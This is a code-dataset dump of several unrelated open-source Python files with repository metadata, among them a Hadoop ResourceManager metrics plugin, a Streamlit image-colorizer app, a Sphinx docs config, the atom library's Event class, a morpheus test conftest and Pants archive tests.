eval_Hessian(model, loss_func, dataloader, num_classes, savepath)
# GGN
file_name = "topC_fb_GGN"
savepath = get_eval_savepath(problem_cls, optimizer_cls, checkpoint, file_name)
eval_GGN(model, loss_func, dataloader, num_classes, savepath)
# Gradient
file_name = "fb_gradient"
savepath = get_eval_savepath(problem_cls, optimizer_cls, checkpoint, file_name)
eval_gradient(model, loss_func, dataloader, savepath)
# ======================================================================================
# Parser for the two command line arguments `config_str` and `checkpoint`
# ======================================================================================
def get_args_parser():
"""Create a parser for the command line arguments."""
parser_description = "Parse ``config_str`` and ``checkpoint``."
parser = argparse.ArgumentParser(description=parser_description)
parser.add_argument(
"--config_str",
dest="config_str",
action="store",
type=str,
help="The configuration as a string",
)
parser.add_argument(
"--checkpoint",
nargs=2,
dest="checkpoint",
action="store",
type=int,
help="The checkpoint (a tuple)",
)
return parser
if __name__ == "__main__":
# Parse command line arguments
parser = get_args_parser()
args = parser.parse_args()
config = config_str_to_config(args.config_str)
checkpoint = tuple(args.checkpoint)
# Evaluate checkpoint
eval_checkpoint(config, checkpoint)
| 35.04329
| 88
| 0.643854
|
b883fb7445a0299e878f0b6403af3db3196813a3
| 1,559
|
py
|
Python
|
hadoop_resourcemanager_metrics/hadoop_resourcemanager_metrics.py
|
sasank1/plugins
|
f12dcb207dcd53819f2f23eeaab3b60a40885d4b
|
[
"BSD-2-Clause"
] | 1
|
2019-12-10T06:44:19.000Z
|
2019-12-10T06:44:19.000Z
|
hadoop_resourcemanager_metrics/hadoop_resourcemanager_metrics.py
|
sasank1/plugins
|
f12dcb207dcd53819f2f23eeaab3b60a40885d4b
|
[
"BSD-2-Clause"
] | null | null | null |
hadoop_resourcemanager_metrics/hadoop_resourcemanager_metrics.py
|
sasank1/plugins
|
f12dcb207dcd53819f2f23eeaab3b60a40885d4b
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/python3
### Author: Vinoth Manoharan, Zoho Corp
### Language : Python
### Tested in Ubuntu
import urllib.request, json
# if any impacting changes to this plugin kindly increment the plugin
# version here.
PLUGIN_VERSION = "1"
# Setting this to true will alert you when there is a communication
# problem while posting plugin data to server
HEARTBEAT = "true"
# Config Section:
HADOOP_HOST = "localhost"
HADOOP_PORT = "8088"
METRICS_UNITS = {'allocatedMB': 'MB',
'totalMB': 'MB',
'availableMB': 'MB',
'appsSubmitted':'Units',
'appsCompleted':'Units',
'appsPending':'Units',
'totalVirtualCores': 'Units',
'allocatedVirtualCores': 'Units',
'availableVirtualCores': 'Units',
'totalNodes': 'Units',
}
class ResourceManager:
def __init__(self, hostName="localhost", port="8088"):
self.url = 'http://%s:%s/ws/v1/cluster/metrics' % (hostName, port)
self.req = urllib.request.Request(self.url)
def metricCollector(self):
data = {}
with urllib.request.urlopen(self.req) as res:
result = json.loads(res.read().decode())
result = result["clusterMetrics"]
result['units'] = METRICS_UNITS
return result
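# Sketch of the structure returned above (values illustrative; keys come from
# the YARN cluster metrics API plus the injected 'units' entry):
#
#     {
#         "appsSubmitted": 4,
#         "totalMB": 8192,
#         "availableMB": 6144,
#         "units": {...}
#     }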
if __name__ == "__main__":
r = ResourceManager(hostName=HADOOP_HOST, port=HADOOP_PORT)
result = r.metricCollector()
print(json.dumps(result, indent=4, sort_keys=True))
| 28.87037
| 74
| 0.600385
|
8e317bdeab1950aed4b0adb3bc24fe5adf4f1412
| 1,423
|
py
|
Python
|
streamlit_app.py
|
drprajapati/streamlit-deolidfy
|
05f644c012c05df8d84e89ffae10714885182022
|
[
"MIT"
] | 1
|
2021-07-26T04:12:03.000Z
|
2021-07-26T04:12:03.000Z
|
streamlit_app.py
|
drprajapati/streamlit-deolidfy
|
05f644c012c05df8d84e89ffae10714885182022
|
[
"MIT"
] | null | null | null |
streamlit_app.py
|
drprajapati/streamlit-deolidfy
|
05f644c012c05df8d84e89ffae10714885182022
|
[
"MIT"
] | 1
|
2021-05-24T06:42:30.000Z
|
2021-05-24T06:42:30.000Z
|
import uuid
from deoldify.visualize import *
from app_utils import download
from app_utils import generate_random_filename
from app_utils import clean_me
from app_utils import clean_all
from app_utils import create_directory
from app_utils import get_model_bin
from app_utils import convertToJPG
import fastai
import torch
import streamlit as st
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])
image_colorizer = get_image_colorizer(root_folder=Path('/app/streamlit-deolidfy/deoldify/'), artistic=True)
print(image_colorizer)
if torch.cuda.is_available():
torch.backends.cudnn.benchmark = True
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def process_image(input_path):
render_factor = 30
result = image_colorizer.plot_transformed_image(path='test_images/' + input_path, figsize=(20,20), render_factor=int(render_factor), display_render_factor=True, compare=False)
return result
if __name__ == '__main__':
uploaded_file = st.file_uploader("Choose an image for Improvisation...", type="jpg")
if uploaded_file is not None:
image = Image.open(uploaded_file)
image.save('test_images/' + str(uploaded_file.name))
st.image(image, caption='Uploaded Image.', use_column_width=True)
image_colorizer = get_image_colorizer(artistic=True)
results = process_image(uploaded_file.name)
st.image(results)
| 34.707317
| 179
| 0.762474
|
7ab024b8bf8a278f9e79ccbce7f7879c9371c0ce
| 49
|
py
|
Python
|
test/output/031.py
|
EliRibble/pyfmt
|
e84a5531a7c06703eddd9dbc2072b0c8deae8c57
|
[
"MIT"
] | null | null | null |
test/output/031.py
|
EliRibble/pyfmt
|
e84a5531a7c06703eddd9dbc2072b0c8deae8c57
|
[
"MIT"
] | null | null | null |
test/output/031.py
|
EliRibble/pyfmt
|
e84a5531a7c06703eddd9dbc2072b0c8deae8c57
|
[
"MIT"
] | null | null | null |
class Foo():
def __init__(self):
self.bar = 0
| 12.25
| 20
| 0.632653
|
ab384369df092236be9c84869834cdca9708c544
| 3,285
|
py
|
Python
|
docs/conf.py
|
gregjhogan/openpilo
|
9d753eb29c4a106f78db23f693cd788f8f861cc8
|
[
"MIT"
] | 37,508
|
2016-11-30T18:18:49.000Z
|
2022-03-31T23:52:00.000Z
|
docs/conf.py
|
gregjhogan/openpilo
|
9d753eb29c4a106f78db23f693cd788f8f861cc8
|
[
"MIT"
] | 3,719
|
2016-11-30T19:25:03.000Z
|
2022-03-31T22:03:56.000Z
|
docs/conf.py
|
gregjhogan/openpilo
|
9d753eb29c4a106f78db23f693cd788f8f861cc8
|
[
"MIT"
] | 7,859
|
2016-11-30T19:03:05.000Z
|
2022-03-31T22:56:37.000Z
|
# type: ignore
# pylint: skip-file
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('..'))
# -- Project information -----------------------------------------------------
project = 'openpilot'
copyright = '2021, comma.ai'
author = 'comma.ai'
language = 'en'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc', # Auto-generate docs
'sphinx.ext.viewcode', # Add view code link to modules
'sphinx_rtd_theme', # Read The Docs theme
'myst_parser', # Markdown parsing
'sphinx_sitemap', # sitemap generation for SEO
]
myst_html_meta = {
"description": "openpilot docs",
"keywords": "op, openpilot, docs, documentation",
"robots": "all,follow",
"googlebot": "index,follow,snippet,archive",
"property=og:locale": "en_US",
"property=og:site_name": "docs.comma.ai",
"property=og:url": "https://docs.comma.ai",
"property=og:title": "openpilot Docuemntation",
"property=og:type": "website",
"property=og:image:type": "image/jpeg",
"property=og:image:width": "400",
"property=og:image": "https://docs.comma.ai/_static/logo.png",
"property=og:image:url": "https://docs.comma.ai/_static/logo.png",
"property=og:image:secure_url": "https://docs.comma.ai/_static/logo.png",
"property=og:description": "openpilot Documentation",
"property=twitter:card": "summary_large_image",
"property=twitter:logo": "https://docs.comma.ai/_static/logo.png",
"property=twitter:title": "openpilot Documentation",
"property=twitter:description": "openpilot Documentation"
}
html_baseurl = 'https://docs.comma.ai/'
sitemap_filename = "sitemap.xml"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_extra_path = ['_static']
| 36.5
| 79
| 0.666971
|
727f898028275f4be5d5335c22552bfc88bfd1cd
| 2,003
|
py
|
Python
|
atom/event.py
|
Tillsten/atom
|
19b6291f7d3c9b3828dcd73e900b8dcbc2ddf92d
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
atom/event.py
|
Tillsten/atom
|
19b6291f7d3c9b3828dcd73e900b8dcbc2ddf92d
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
atom/event.py
|
Tillsten/atom
|
19b6291f7d3c9b3828dcd73e900b8dcbc2ddf92d
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
#------------------------------------------------------------------------------
# Copyright (c) 2013-2017, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from .catom import Member, Validate, GetAttr, SetAttr, DelAttr
class Event(Member):
""" A member which acts like a stateless event.
"""
__slots__ = ()
def __init__(self, kind=None):
""" Initialize an Event.
Parameters
----------
kind : type or Member, optional
The type of argument which may be emitted by the event or
a Member which will validate the argument which can be
emitted. The default is None and indicates no validation
will be performed.
"""
self.set_getattr_mode(GetAttr.Event, None)
self.set_setattr_mode(SetAttr.Event, None)
self.set_delattr_mode(DelAttr.Event, None)
if kind is not None:
if isinstance(kind, Member):
self.set_validate_mode(Validate.Delegate, kind)
else:
self.set_validate_mode(Validate.Instance, kind)
def set_name(self, name):
""" A reimplemented parent class method.
This method ensures that the delegate name is also set, if a
delegate validator is being used.
"""
super(Event, self).set_name(name)
mode, kind = self.validate_mode
if isinstance(kind, Member):
kind.set_name(name)
def set_index(self, index):
""" A reimplemented parent class method.
This method ensures that the delegate index is also set, if a
delegate validator is being used.
"""
super(Event, self).set_index(index)
mode, kind = self.validate_mode
if isinstance(kind, Member):
kind.set_index(index)
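# Usage sketch (assumes the Atom base class from this package; the change
# dict keys follow the framework's observer conventions):
#
#     from atom.api import Atom, Event
#
#     class Button(Atom):
#         clicked = Event(int)   # payload validated as int
#
#     b = Button()
#     b.observe('clicked', lambda change: print(change['value']))
#     b.clicked = 42             # fires the event; no value is stored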
| 32.836066
| 79
| 0.574638
|
17fb802e395f33ebeddf9212b8bedb630a02e608
| 6,750
|
py
|
Python
|
tests/conftest.py
|
alextford11/morpheus
|
74cd3482e06b66316847587dcdd124ac989f809d
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
alextford11/morpheus
|
74cd3482e06b66316847587dcdd124ac989f809d
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
alextford11/morpheus
|
74cd3482e06b66316847587dcdd124ac989f809d
|
[
"MIT"
] | null | null | null |
import asyncio
import pytest
import re
import uuid
from aiohttp.test_utils import teardown_test_loop
from aioredis import create_redis
from arq import ArqRedis, Worker
from atoolbox.db import prepare_database
from atoolbox.db.helpers import DummyPgPool
from atoolbox.test_utils import DummyServer, create_dummy_server
from buildpg import Values, asyncpg
from morpheus.app.main import create_app
from morpheus.app.models import EmailSendModel, SendMethod
from morpheus.app.settings import Settings
from morpheus.app.views import get_create_company_id
from morpheus.app.worker import startup as worker_startup, worker_functions
from . import dummy_server
def pytest_addoption(parser):
parser.addoption('--reuse-db', action='store_true', default=False, help='keep the existing database if it exists')
pg_settings = dict(pg_dsn='postgres://postgres:waffle@localhost:5432/morpheus_test')
@pytest.fixture(scope='session', name='clean_db')
def _fix_clean_db(request):
# loop fixture has function scope so can't be used here.
settings = Settings(**pg_settings)
loop = asyncio.new_event_loop()
loop.run_until_complete(prepare_database(settings, not request.config.getoption('--reuse-db')))
teardown_test_loop(loop)
@pytest.fixture(name='db_conn')
async def _fix_db_conn(loop, settings, clean_db):
conn = await asyncpg.connect_b(dsn=settings.pg_dsn, loop=loop)
tr = conn.transaction()
await tr.start()
await conn.execute("set client_min_messages = 'log'")
yield conn
await tr.rollback()
await conn.close()
@pytest.yield_fixture
async def redis(loop, settings):
addr = settings.redis_settings.host, settings.redis_settings.port
redis = await create_redis(addr, db=settings.redis_settings.database, encoding='utf8', commands_factory=ArqRedis)
await redis.flushdb()
yield redis
redis.close()
await redis.wait_closed()
@pytest.fixture(name='dummy_server')
async def _fix_dummy_server(aiohttp_server):
ctx = {'mandrill_subaccounts': {}}
return await create_dummy_server(aiohttp_server, extra_routes=dummy_server.routes, extra_context=ctx)
@pytest.fixture
def settings(tmpdir, dummy_server: DummyServer):
return Settings(
**pg_settings,
auth_key='testing-key',
test_output=str(tmpdir),
pdf_generation_url=dummy_server.server_name + '/generate.pdf',
mandrill_key='good-mandrill-testing-key',
log_level='ERROR',
mandrill_url=dummy_server.server_name + '/mandrill',
mandrill_timeout=0.5,
host_name=None,
click_host_name='click.example.com',
messagebird_key='good-messagebird-testing-key',
messagebird_url=dummy_server.server_name + '/messagebird',
messagebird_pricing_api=dummy_server.server_name + '/messagebird-pricing',
messagebird_pricing_username='mb-username',
messagebird_pricing_password='mb-password',
stats_token='test-token',
max_request_stats=10,
)
@pytest.fixture(name='cli')
async def _fix_cli(loop, test_client, settings, db_conn, redis):
async def pre_startup(app):
app.update(redis=redis, pg=DummyPgPool(db_conn))
app = create_app(settings=settings)
app.update(pg=DummyPgPool(db_conn), webhook_auth_key=b'testing')
app.on_startup.insert(0, pre_startup)
cli = await test_client(app)
cli.server.app['morpheus_api'].root = f'http://localhost:{cli.server.port}/'
return cli
@pytest.fixture
def send_email(cli, worker):
async def _send_message(status_code=201, **extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='<body>\n{{{ message }}}\n</body>',
company_code='foobar',
from_address='Sender Name <sender@example.com>',
method='email-test',
subject_template='test message',
context={'message': 'this is a test'},
recipients=[{'address': 'foobar@testing.com'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/email/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == status_code
await worker.run_check()
if len(data['recipients']) != 1:
return NotImplemented
else:
return re.sub(r'[^a-zA-Z0-9\-]', '', f'{data["uid"]}-{data["recipients"][0]["address"]}')
return _send_message
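# Sketch of a test using the fixture above (test body hypothetical):
#
#     async def test_send_single_email(send_email):
#         msg_id = await send_email()   # sends one message and runs the worker
#         assert '-' in msg_id          # "<uid>-<sanitized address>" style id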
@pytest.fixture
def send_sms(cli, worker):
async def _send_message(**extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='this is a test {{ variable }}',
company_code='foobar',
from_name='FooBar',
method='sms-test',
context={'variable': 'apples'},
recipients=[{'number': '07896541236'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/sms/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == 201
await worker.run_check()
return data['uid'] + '-447896541236'
return _send_message
@pytest.yield_fixture(name='worker_ctx')
async def _fix_worker_ctx(settings, db_conn):
ctx = dict(settings=settings, pg=DummyPgPool(db_conn))
await worker_startup(ctx)
yield ctx
await asyncio.gather(ctx['session'].close(), ctx['mandrill'].close(), ctx['messagebird'].close())
@pytest.yield_fixture(name='worker')
async def _fix_worker(cli, worker_ctx):
worker = Worker(
functions=worker_functions, redis_pool=cli.server.app['redis'], burst=True, poll_delay=0.01, ctx=worker_ctx
)
yield worker
await worker.close()
@pytest.fixture(name='call_send_emails')
def _fix_call_send_emails(db_conn):
async def run(**kwargs):
base_kwargs = dict(
uid=str(uuid.uuid4()),
subject_template='hello',
company_code='test',
from_address='testing@example.com',
method=SendMethod.email_mandrill,
recipients=[],
)
m = EmailSendModel(**dict(base_kwargs, **kwargs))
company_id = await get_create_company_id(db_conn, m.company_code)
group_id = await db_conn.fetchval_b(
'insert into message_groups (:values__names) values :values returning id',
values=Values(
uuid=m.uid,
company_id=company_id,
message_method=m.method.value,
from_email=m.from_address.email,
from_name=m.from_address.name,
),
)
return group_id, company_id, m
return run
| 33.415842
| 118
| 0.668741
|
6dcf71ca6f4aa56b617d6b6305be37dec4959b5a
| 5,553
|
py
|
Python
|
src/python/pants/core/util_rules/archive_test.py
|
yoav-orca/pants
|
995448e9add343975844c7a43d5d64618fc4e4d9
|
[
"Apache-2.0"
] | 1,806
|
2015-01-05T07:31:00.000Z
|
2022-03-31T11:35:41.000Z
|
src/python/pants/core/util_rules/archive_test.py
|
yoav-orca/pants
|
995448e9add343975844c7a43d5d64618fc4e4d9
|
[
"Apache-2.0"
] | 9,565
|
2015-01-02T19:01:59.000Z
|
2022-03-31T23:25:16.000Z
|
src/python/pants/core/util_rules/archive_test.py
|
ryanking/pants
|
e45b00d2eb467b599966bca262405a5d74d27bdd
|
[
"Apache-2.0"
] | 443
|
2015-01-06T20:17:57.000Z
|
2022-03-31T05:28:17.000Z
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import gzip
import tarfile
import zipfile
from io import BytesIO
import pytest
from pants.core.util_rules.archive import ArchiveFormat, CreateArchive, ExtractedArchive
from pants.core.util_rules.archive import rules as archive_rules
from pants.engine.fs import Digest, DigestContents, FileContent
from pants.testutil.rule_runner import QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*archive_rules(),
QueryRule(Digest, [CreateArchive]),
QueryRule(ExtractedArchive, [Digest]),
],
)
FILES = {"foo": b"bar", "hello/world": b"Hello, World!"}
EXPECTED_DIGEST_CONTENTS = DigestContents(
[FileContent(name, content) for name, content in FILES.items()]
)
@pytest.mark.parametrize("compression", [zipfile.ZIP_STORED, zipfile.ZIP_DEFLATED])
def test_extract_zip(rule_runner: RuleRunner, compression: int) -> None:
io = BytesIO()
with zipfile.ZipFile(io, "w", compression=compression) as zf:
for name, content in FILES.items():
zf.writestr(name, content)
io.flush()
input_snapshot = rule_runner.make_snapshot({"test.zip": io.getvalue()})
extracted_archive = rule_runner.request(ExtractedArchive, [input_snapshot.digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == EXPECTED_DIGEST_CONTENTS
@pytest.mark.parametrize("compression", ["", "gz", "bz2", "xz"])
def test_extract_tar(rule_runner: RuleRunner, compression: str) -> None:
io = BytesIO()
mode = f"w:{compression}" if compression else "w"
with tarfile.open(mode=mode, fileobj=io) as tf:
for name, content in FILES.items():
tarinfo = tarfile.TarInfo(name)
tarinfo.size = len(content)
tf.addfile(tarinfo, BytesIO(content))
ext = f"tar.{compression}" if compression else "tar"
input_snapshot = rule_runner.make_snapshot({f"test.{ext}": io.getvalue()})
extracted_archive = rule_runner.request(ExtractedArchive, [input_snapshot.digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == EXPECTED_DIGEST_CONTENTS
def test_extract_gz(rule_runner: RuleRunner) -> None:
# NB: `gz` files are only compressed, and are not archives: they represent a single file.
name = "test"
content = b"Hello world!\n"
io = BytesIO()
with gzip.GzipFile(fileobj=io, mode="w") as gzf:
gzf.write(content)
io.flush()
input_snapshot = rule_runner.make_snapshot({f"{name}.gz": io.getvalue()})
rule_runner.set_options(args=[], env_inherit={"PATH", "PYENV_ROOT", "HOME"})
extracted_archive = rule_runner.request(ExtractedArchive, [input_snapshot.digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == DigestContents([FileContent(name, content)])
def test_extract_non_archive(rule_runner: RuleRunner) -> None:
input_snapshot = rule_runner.make_snapshot({"test.sh": b"# A shell script"})
extracted_archive = rule_runner.request(ExtractedArchive, [input_snapshot.digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert DigestContents([FileContent("test.sh", b"# A shell script")]) == digest_contents
def test_create_zip_archive(rule_runner: RuleRunner) -> None:
output_filename = "demo/a.zip"
input_snapshot = rule_runner.make_snapshot(FILES)
created_digest = rule_runner.request(
Digest,
[CreateArchive(input_snapshot, output_filename=output_filename, format=ArchiveFormat.ZIP)],
)
digest_contents = rule_runner.request(DigestContents, [created_digest])
assert len(digest_contents) == 1
io = BytesIO()
io.write(digest_contents[0].content)
with zipfile.ZipFile(io) as zf:
assert set(zf.namelist()) == set(FILES.keys())
# We also use Pants to extract the created archive, which checks for idempotency.
extracted_archive = rule_runner.request(ExtractedArchive, [created_digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == EXPECTED_DIGEST_CONTENTS
@pytest.mark.parametrize(
"format", [ArchiveFormat.TAR, ArchiveFormat.TGZ, ArchiveFormat.TXZ, ArchiveFormat.TBZ2]
)
def test_create_tar_archive(rule_runner: RuleRunner, format: ArchiveFormat) -> None:
output_filename = f"demo/a.{format.value}"
input_snapshot = rule_runner.make_snapshot(FILES)
created_digest = rule_runner.request(
Digest,
[CreateArchive(input_snapshot, output_filename=output_filename, format=format)],
)
digest_contents = rule_runner.request(DigestContents, [created_digest])
assert len(digest_contents) == 1
io = BytesIO()
io.write(digest_contents[0].content)
io.seek(0)
compression = "" if format == ArchiveFormat.TAR else f"{format.value[4:]}" # Strip `tar.`.
with tarfile.open(fileobj=io, mode=f"r:{compression}") as tf:
assert set(tf.getnames()) == set(FILES.keys())
# We also use Pants to extract the created archive, which checks for idempotency.
extracted_archive = rule_runner.request(ExtractedArchive, [created_digest])
digest_contents = rule_runner.request(DigestContents, [extracted_archive.digest])
assert digest_contents == EXPECTED_DIGEST_CONTENTS
| 41.75188
| 99
| 0.726994
|